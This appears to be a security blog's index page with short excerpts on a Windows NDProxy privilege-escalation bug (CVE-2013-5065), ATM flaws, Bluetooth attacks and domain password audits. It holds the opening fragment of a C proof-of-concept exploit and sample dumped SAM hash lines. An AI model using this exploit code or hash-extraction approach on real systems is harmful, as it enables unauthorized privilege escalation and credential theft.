NDProxy Privilege Escalation (CVE-2013-5065)

Introduction In the last few days everyone is raving about CVE-2013-5065, a new Windows XP/2k3 privilege escalation, well documented by FireEye. Googling around, we came across a Twitter message which contained a link to a Chinese vulnerability analysis and PoC for CVE-2013-5065. Exploit POC: #include “windows.h” #include “stdio.h” void main(){ HANDLE hdev=CreateFile(“\\.\NDProxy”,GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0 , NULL); if hdev==INVALID_HANDLE_VALUE){ printf(“CreateFile Failed: %d/n”,GetLastError()); } DWORD InBuf [0x15] = {0}; DWORD dwRetbytes…

ATM In-Security in 2013 | ATM Security Flaws & Vulnerabilities

Introduction With the recent SecTor security conference in Toronto Canada, once again ATM security flaws have risen to the top of the agenda.  ATM flaws have become wide-stream knowledge since Barnaby Jack showed off his ‘Jackpotting‘ attack.  ATM flaws have once again become a hot-topic since the late Barnaby’s demise two weeks prior to this years Blackhat conference (USA 2013) where he was going to present about Pacemaker flaws.  Barnaby…

Bluetooth Sniffing | Bluetooth Vulnerabilities | InteliSecure

After the previous post Ubertooth – Open Source Bluetooth Sniffing, many have asked the question why? People can remember some of the original Bluetooth holes back between 2004-2008 but vulnerabilities are simply not common these days. Small list of vulnerabilities on Phones: Stealing Address Books from Nokia Phones. Remote Dialing 090* numbers. Blasting audio down headsets/car stereos. Depending on the Bluetooth implementation sometimes security and/or encryption is not applied.  As…

Domain Password Audits | InteliSecure

Background With Anti-Virus technology continuing to block auditing/hacking tools like pwdump/fgdump, the ability to audit passwords on a domain is starting to increase in difficultly.  In a series of recent audits it has been challenging to extract the domain hashes, and upon using familiar common tools like pwdump the Windows Security Accounts Manager (SAM); surprisingly only reveals two accounts, where we would expect a long list of domain hashes. Example Output: Administrator:500:3CED43EE2B6F79553F211111D2509C89:2A39F8C2138329F953111D035C1E99AB::: Guest:501:C5C111117DB4E3E7C1E86A266265BCA9:F6B11111D3531AA18821F8B087AE2610::: These…